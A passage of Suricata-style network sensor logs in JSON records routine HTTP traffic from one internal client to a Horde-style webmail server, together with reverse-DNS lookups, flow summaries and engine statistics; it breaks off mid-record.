{"timestamp":"2020-02-29T00:26:28.111618+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:26:30.000707+0000","flow_id":541469470307065,"event_type":"flow","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":30,"bytes_toserver":5429,"bytes_toclient":24522,"start":"2020-02-29T00:25:19.013049+0000","end":"2020-02-29T00:25:29.452530+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:32.959634+0000","flow_id":1660149541607404,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53162,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":0}} 
{"timestamp":"2020-02-29T00:26:33.000861+0000","flow_id":1107327101640732,"event_type":"flow","src_ip":"192.168.10.122","src_port":41965,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:21:31.925724+0000","end":"2020-02-29T00:21:32.037252+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:33.118390+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53160,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":127,"tx_id":0}} 
{"timestamp":"2020-02-29T00:26:34.000207+0000","event_type":"stats","stats":{"uptime":15246,"capture":{"kernel_packets":142142,"kernel_drops":0},"decoder":{"pkts":142143,"bytes":97641084,"invalid":195,"ipv4":140548,"ipv6":10,"ethernet":142143,"raw":0,"null":0,"sll":0,"tcp":134958,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087552},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2917,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2933,"synack":2924,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2897,"new_pruned":17,"est_pruned":2545,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10561,"memcap_state":0,"memcap_global":0},"http":{"memuse":720,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:38.001255+0000","flow_id":536109336509111,"event_type":"flow","src_ip":"192.168.10.122","src_port":38791,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:21:36.998071+0000","end":"2020-02-29T00:21:37.106785+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:39.000856+0000","flow_id":407294692922328,"event_type":"flow","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1415,"bytes_toclient":6320,"start":"2020-02-29T00:25:33.627672+0000","end":"2020-02-29T00:25:38.952415+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:26:41.000179+0000","event_type":"stats","stats":{"uptime":15253,"capture":{"kernel_packets":142145,"kernel_drops":0},"decoder":{"pkts":142149,"bytes":97641480,"invalid":195,"ipv4":140554,"ipv6":10,"ethernet":142149,"raw":0,"null":0,"sll":0,"tcp":134964,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086688},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2917,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2933,"synack":2924,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2898,"new_pruned":17,"est_pruned":2547,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":640,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:45.000717+0000","flow_id":681193347724086,"event_type":"flow","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1393,"bytes_toclient":6320,"start":"2020-02-29T00:25:39.439094+0000","end":"2020-02-29T00:25:44.703225+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:48.000214+0000","event_type":"stats","stats":{"uptime":15260,"capture":{"kernel_packets":142149,"kernel_drops":0},"decoder":{"pkts":142237,"bytes":97725258,"invalid":195,"ipv4":140642,"ipv6":10,"ethernet":142237,"raw":0,"null":0,"sll":0,"tcp":135052,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086688},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2918,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2934,"synack":2925,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2547,"bypas
sed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:50.650903+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55832,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19892,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:50.759669+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55832,"proto":"UDP","dns":{"type":"answer","id":19892,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:50.759669+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55832,"proto":"UDP","dns":{"type":"answer","id":19892,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:53.000483+0000","flow_id":2032669216969740,"event_type":"flow","src_ip":"192.168.10.122","src_port":33731,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:51.889868+0000","end":"2020-02-29T00:21:52.001579+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:26:55.000159+0000","event_type":"stats","stats":{"uptime":15267,"capture":{"kernel_packets":142248,"kernel_drops":0},"decoder":{"pkts":142254,"bytes":97728544,"invalid":196,"ipv4":140657,"ipv6":10,"ethernet":142254,"raw":0,"null":0,"sll":0,"tcp":135064,"udp":5382,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2919,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2935,"synack":2926,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2462,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2546}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2548,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:57.000181+0000","flow_id":1410057873142980,"event_type":"flow","src_ip":"192.168.10.122","src_port":60566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:56.275652+0000","end":"2020-02-29T00:21:56.384455+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:57.000808+0000","flow_id":1686898580184385,"event_type":"flow","src_ip":"192.168.10.122","src_port":35597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:56.580929+0000","end":"2020-02-29T00:21:56.692104+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:59.391250+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55048,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18473,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:59.499528+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55048,"proto":"UDP","dns":{"type":"answer","id":18473,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:59.499528+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55048,"proto":"UDP","dns":{"type":"answer","id":18473,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:26:59.699545+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8085}} {"timestamp":"2020-02-29T00:27:02.000204+0000","event_type":"stats","stats":{"uptime":15274,"capture":{"kernel_packets":142262,"kernel_drops":0},"decoder":{"pkts":142279,"bytes":97739194,"invalid":196,"ipv4":140680,"ipv6":10,"ethernet":142279,"raw":0,"null":0,"sll":0,"tcp":135085,"udp":5384,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2920,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2936,"synack":2927,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1924,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2463,"failed_udp":116},"tx":{"http":5024,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2547}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2550,"bypassed_pruned":0,"flows_che
cked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9900,"memcap_state":0,"memcap_global":0},"http":{"memuse":86179,"memcap":0}}} {"timestamp":"2020-02-29T00:27:04.287799+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8085},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47025,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.298851+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51720,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45791,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:04.407027+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51720,"proto":"UDP","dns":{"type":"answer","id":45791,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:04.407027+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51720,"proto":"UDP","dns":{"type":"answer","id":45791,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:27:04.518331+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8529}} {"timestamp":"2020-02-29T00:27:04.548359+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8529},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.556000+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} 
{"timestamp":"2020-02-29T00:27:04.558855+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.559330+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} {"timestamp":"2020-02-29T00:27:04.568875+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.569324+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:27:04.570867+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:27:04.572003+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":4}} {"timestamp":"2020-02-29T00:27:04.575006+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:27:04.582851+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":5}} 
{"timestamp":"2020-02-29T00:27:04.583567+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:27:04.581934+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 